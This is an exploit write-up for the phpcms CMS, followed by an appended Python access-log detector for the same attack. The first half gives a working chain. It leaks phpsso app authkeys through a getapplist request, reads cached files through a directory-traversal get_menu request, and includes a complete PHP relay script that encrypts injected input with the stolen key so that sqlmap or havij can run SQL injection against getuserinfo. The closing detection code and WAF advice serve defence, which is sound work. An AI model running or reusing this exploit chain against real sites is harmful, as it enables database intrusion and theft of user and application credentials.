1.
"Do as you please" vulnerability:
After registering and logging in, visit
http://localhost:8038/study/phpcms/index.php?m=member&c=index&a=account_manage_avatar&t=1
View the page source:
In it you find this string:
aHR0cDovL2xvY2FsaG9zdDo4MDM4L3N0dWR5L3BocGNtcy9waHBzc29fc2VydmVyL2luZGV4LnBocD9tPXBocHNzbyZjPWluZGV4JmE9dXBsb2FkYXZhdGFyJmF1dGhfZGF0YT12PTEmYXBwaWQ9MSZkYXRhPWU1YzJWQU1HVVFaUkFRa0lVUVFLVndGVUFnSUNWZ0FJQWxkVkJRRkREUVZjVjBNVVFHa0FReFZaWmxNRUdBOSUyQkRqWm9LMUFIUm1Vd0JHY09YVzVVRGdRaEpEeGFlUVZuR0FkeFZSY0tRQQ==
base64-decoding it gives
http://localhost:8038/study/phpcms/phpsso_server/index.php?m=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9%2BDjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQA
Replace uploadavatar in the URL with getapplist to get:
http://localhost:8038/study/phpcms/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9%2BDjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQA
2.
http://www.test.org/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
Once the relay is up, just point sqlmap or havij at it. sqlmap works very badly through the relay. Try it if you don't believe me.
Relay script:
<?php
set_time_limit(0);
// Target site base URL and the application's authkey, as in the original script.
$wang_url = 'http://www.0day5.com';
$auth_key = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx';
// The id parameter is appended to "uid=1", encrypted with sys_auth and forwarded
// to the getuserinfo action; the response body is returned to the caller.
$str = "uid=1" . stripslashes($_GET['id']);
$encode = sys_auth($str, 'ENCODE', $auth_key);
$content = file_get_contents($wang_url . "/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=" . $encode);
echo $content;

// phpcms sys_auth: a reversible XOR cipher keyed on md5($key). Ciphertext is
// prefixed by a 4-char random token; plaintext carries a 10-digit expiry and a
// 16-char md5 check prefix that is verified on DECODE.
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
    $key_length = 4;
    $key = md5($key);
    $fixedkey = hash('md5', $key);
    $egiskeys = md5(substr($fixedkey, 16, 16));
    $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
    $keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
    $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));
    $i = 0; $result = '';
    $string_length = strlen($string);
    for ($i = 0; $i < $string_length; $i++) {
        // Original used $string{$i}; the curly-brace offset syntax was removed in PHP 8, [$i] is equivalent.
        $result .= chr(ord($string[$i]) ^ ord($keys[$i % 32]));
    }
    if ($operation == 'ENCODE') {
        return $runtokey . str_replace('=', '', base64_encode($result));
    } else {
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    }
}
?>
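The three request shapes this writeup relies on (phpsso getapplist with a borrowed auth_data, api.php get_menu with a traversing cachefile, and a stream of getuserinfo calls carrying an encrypted data parameter) are all visible in an ordinary web-server access log. The following Python is an added detection example written for this page, not code from the original post or from phpcms; the log lines are constructed, and the app_servers allow-list (hosts that legitimately call getuserinfo server-to-server) is an assumption you would fill from your own deployment.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format access-log lines (not from the page); the data=
# values are placeholders, not real phpsso tokens.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /study/phpcms/index.php?m=member&c=index&a=account_manage_avatar&t=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /study/phpcms/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=AAAA HTTP/1.1" 200 900
10.0.0.6 - - [01/Jan/2024:10:01:00 +0000] "GET /api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..%5C..%5C..%5Cphpsso_server%5Ccaches%5Ccaches_admin%5Ccaches_data%5Capplist&path=admin HTTP/1.1" 200 300
10.0.0.7 - - [01/Jan/2024:10:02:00 +0000] "GET /phpsso_server/index.php?m=phpsso&c=index&a=getuserinfo&appid=1&data=ZZZZ HTTP/1.1" 200 128
10.0.0.8 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php?m=content&c=index&a=show&id=1 HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def parse_line(line):
    """Split one combined-format line into client IP, URL path and decoded query params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs percent-decodes values, so ..%5C.. becomes ..\.. here.
    params = {k.lower(): v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {"ip": m.group("ip"), "path": parts.path.lower(), "params": params}


def classify(req):
    """Return the list of rule names that match one parsed request."""
    path, p = req["path"], req["params"]
    findings = []
    # Rule 1: phpsso app list request; the response discloses every app's authkey.
    if "phpsso_server" in path and p.get("m") == "phpsso" and p.get("a") == "getapplist":
        findings.append("phpsso-getapplist")
    # Rule 2: get_menu with a cachefile that walks out of its directory
    # (backslashes normalised so Windows-style traversal is caught too).
    if path.endswith("api.php") and p.get("op") == "get_menu":
        cachefile = p.get("cachefile", "").replace("\\", "/")
        if ".." in cachefile.split("/"):
            findings.append("get_menu-cachefile-traversal")
    # Rule 3: getuserinfo with an encrypted data blob; legitimate only from app servers.
    if "phpsso_server" in path and p.get("a") == "getuserinfo" and "data" in p:
        findings.append("phpsso-getuserinfo")
    return findings


def scan_log(text, app_servers=frozenset()):
    """Yield (ip, rule) alerts for every line; getuserinfo from known app servers is suppressed."""
    alerts = []
    for line in text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        for rule in classify(req):
            if rule == "phpsso-getuserinfo" and req["ip"] in app_servers:
                continue  # expected server-to-server SSO traffic
            alerts.append((req["ip"], rule))
    return alerts


if __name__ == "__main__":
    for ip, rule in scan_log(SAMPLE_LOG, app_servers={"10.0.0.9"}):
        print(f"{ip}\t{rule}")
```

Rules 1 and 2 are unambiguous: no browser-originated request should ever hit getapplist, and no cachefile value should contain a `..` segment, so both can go straight to a blocking WAF rule. Rule 3 needs the allow-list, because getuserinfo is how the phpcms front end normally talks to phpsso; the interesting signal is the same data parameter arriving from an address that is not one of your own application servers, or in the burst pattern an automated injector produces.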